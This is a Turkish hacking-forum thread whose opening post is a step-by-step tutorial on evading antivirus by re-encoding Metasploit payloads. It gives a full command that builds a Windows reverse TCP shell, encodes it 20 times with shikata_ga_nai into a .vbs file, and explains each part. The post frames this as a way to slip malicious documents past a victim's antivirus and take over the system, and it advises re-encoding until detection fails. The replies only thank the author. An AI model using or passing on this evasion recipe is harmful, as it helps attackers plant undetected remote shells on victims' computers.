İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Antivirüs Algılanmasından Kaçınmak M3tasploit İmzasını Değiştirme

theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Ticaret:
(0) %
26-08-2018 00:31
#1
Arrow
Antivirüs Algılanmasından Kaçınmak M3tasploit İmzasını Değiştirme
Meterplayer ile yük taşıyan veya sistemin sahibi olmanızı sağlayan geri kabuk içeren kötü amaçlı bir PDF veya kötü amaçlı Word belgesi oluşturma konusunda birkaç dinleyici kılavuzu yazdım . Bu teknikleri kullanmanın önündeki engeller hedef sistemdeki antivirüs (AV) yazılımıdır . Örneğin, kötü amaçlı bir PDF veya Word doc'u e-postayla göndermeye çalışırsanız, kurban sistemi kurbana bir virüs veya başka bir zararlı yazılım içerdiğini bildirir muhtemeldir.
Bu dersin ana dersi, bu virüsten koruma yazılımını nasıl geçebileceğimiz.

Antivirüs Yazılımının İşleyişi Hakkında Temel Bilgiler

Virüsten koruma yazılımı şirketleri genellikle yazılımlarını, virüslerin ve diğer kötü amaçlı yazılımların "imzasını" aramak için geliştirir. Çoğu durumda, bilinen zararlı yazılımların tanıdık bir kalıbı için kodun ilk birkaç satırına bakarlar. Vahşi malware bulduklarında, imzalarını virüs / kötü amaçlı yazılım veritabanına eklerler ve bir sonraki bu kötü amaçlı yazılımla karşılaştığında yazılım bilgisayar sahibini uyarır.


Antivirüs Yazılımını Nasıl Atlatabilirsiniz

Açıkçası, sıfır günlük istismar veya yepyeni olan ve AV yazılımı şirketleri tarafından hiç görülemeyen kötü amaçlı yazılımlar, böyle bir algılama şemasında doğru bir şekilde geçecektir.

AV yazılımını geçmenin başka bir yöntemi, kötü amaçlı yazılımın "imzasını" değiştirmek. Başka bir deyişle, kötü amaçlı yazılım kodlamasını işlevselliğini değiştirmeden değiştirebilirsek, AV yazılımını algılamadan kolayca geçmeliyiz. Kodlama becerilerine sahipseniz, herhangi bir kötü amaçlı yazılımı yeniden kodlayabilir ve istenen sonucu elde edebilirsiniz.
Bu gelişmiş kodlama becerilerine sahip değilseniz, hala umut var! ****sploit , msfencode adlı yerleşik bir komutu kullanıyor ve Sukrojan topluluğunu bir exploit imzasını gizlemeye ilişkin daha önceki bir kılavuzda sunmuştum .

M3tasploit yüklerinin imza nasıl değiştirilir

Bu yazıda, bu komutu ve yüklerinizi yeniden kodlamak için olan yeteneklerini daha ayrıntılı inceleyeceğiz. Başlamadan önce hızlı bir not - keşif yap !

Hedef sistemin hangi AV yazılımını kullandığını bulun ve bu AV paketinden kaçınmak için yeniden kodlayın . Hiçbir yeniden kodlama şeması tüm AV yazılımı ile çalışmaz, bu nedenle AV yazılımınızla çalışan, ancak hedef sistemin AV yazılımından kaçınamayacak yeni bir kodlama şeması geliştirmek için vakit harcamayın.

Yani, BackTrack'i açın ve ****sploit'u çalıştıralım!

Msfencode kullanın
Yardım için -h anahtarıyla msfencode yazarak başlayalım .
Kod:
Msfencode -h
Gördüğünüz gibi, bu, bu komutla kullanabileceğimiz tüm anahtarları görüntüler. Not -e anahtarı. Bu, yükümüzü yeniden kodlamak için kullanmak istediğiniz kodlayıcıyı belirtir.

Ayrıca, -t anahtarı ile vurguladığım bölümü unutmayın . Bu anahtar çıktı formatının ne olduğunu belirler. Çiğ, yakut, perl, java, exe, vba, vbs, vb. Dahil olmak üzere birçok formatın olduğunu görebilirsiniz. Bu çıktıların her biri imza değiştirmek ve AV yazılımından kaçmak için bir fırsat verir.

Kodlama Şemalarını Listele
Sonra, msfencode'da hangi kodlayıcıların mevcut olduğunu inceleyelim.
Kod:
Msfencode -L


Bu ekran görüntüsünde olduğu gibi, msfencode çok sayıda farklı kodlama düzenleri içerir. Dördüncü sırada "shikata_ga_nai" görüyoruz. Not "mükemmel" ve bu bir "Polimorfik XOR Katkı Geri Besleme Enkoder" olduğunu. Şimdi buna bir göz atalım.


Şimdi, AV paket yazılımını eski hale getirmek için ters TCP kabuğumuzu yeniden kodlamak için shikata_ga_nai'yi kullanalım. BackTrack komut isteminde şunu yazın:

Kod:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/AVbypass.vbs
Bu komutu ayrı tutalım ve ne yaptığına bakalım.
Kod:
msfpayload windows/shell/reverse_tcp LHOST 192.168.1.101 R
Yukarıdaki bölüm, 192.168.1.101 adresindeki bir yerel ana bilgisayar için ters TCP kabuğu ile bir yük oluşturur.

Kod:
|
Bu sembol, aşağıdaki komutu dolduran boru anlamına gelir.
Kod:
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
Bu yükü skikata_ga_nai ile yeniden kodlamak ve bunu 20 kez çalıştırmak (-c 20) ve daha sonra bir .vbs komut dosyası gibi görünmek üzere kodlamak demektir.

Kod:
> /root/AVbypass.vbs
Yeni şifrelenmiş olan yükü, / root dizinindeki bir dosyaya gönderir ve AVbypass.vbs olarak adlandırır, böylece .vbs komut dosyası gibi görünür.

Yeni şifrelenmiş olan yükü, / root dizinindeki bir dosyaya gönderir ve AVbypass.vbs olarak adlandırır, böylece .vbs komut dosyası gibi görünür.

Bu komutu çalıştırdığımızda, shikata_ga_nai'nin 20 yinelemeyle yükümüzü çalıştırdığını gösteren aşağıdaki çıktıyı alıyoruz.

Şimdi shikata_ga_nai'ye yeni şifrelenmiş yükümüzü göndermek ve orada olup olmadığını kontrol etmek için söylediği dizine gidelim.

Kod:
cd /root
ls -l

Gördüğünüz gibi şimdi, AVbypass.vbs adlı bir kök dizinde bir dosyamız var, şimdi hedefin AV yazılımına karşı bunu test edip etmediğini test edebiliyoruz. Çoğu durumda bu yöntem işe yarıyor, ancak değilse, AV yazılımının algılamadığı bir kodlamayı buluncaya kadar yükü çeşitli yinelemelerle göndermeniz yeterlidir.
Konu theokeleS tarafından (26-08-2018 00:38 Saat 00:38 ) değiştirilmiştir.
Hichigo, Bykurabiye Teşekkür etti.
Bykurabiye - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
Tanrı Dağı
Yaş:
16
Mesajlar:
2.506
Konular:
153
Teşekkür (Etti):
343
Teşekkür (Aldı):
259
Ticaret:
(0) %
26-08-2018 01:11
#2
Eline sağlık.
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Ticaret:
(0) %
26-08-2018 01:41
#3
Alıntı:
Bykurabiye´isimli üyeden Alıntı Mesajı göster
Eline sağlık.
Teşekkür ederim
Hichigo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
~/
Mesajlar:
962
Konular:
131
Teşekkür (Etti):
481
Teşekkür (Aldı):
434
Ticaret:
(0) %
26-08-2018 01:46
#4
backtrack yerine kali de yapsan daha güncel olurdu eline sağlık
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Ticaret:
(0) %
26-08-2018 02:07
#5
Alıntı:
Hichigo´isimli üyeden Alıntı Mesajı göster
backtrack yerine kali de yapsan daha güncel olurdu eline sağlık
Teşekkürler
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Ticaret:
(0) %
26-08-2018 12:45
#6
Güncel
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.941
Konular:
86
Teşekkür (Etti):
201
Teşekkür (Aldı):
925
Ticaret:
(0) %
26-08-2018 23:41
#7
Emeğine Sağlık
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Ticaret:
(0) %
26-08-2018 23:51
#8
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Emeğine Sağlık
Teşekkür ederim hocam
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Konular:
31
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Ticaret:
(0) %
28-08-2018 00:47
#9
Güncel

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı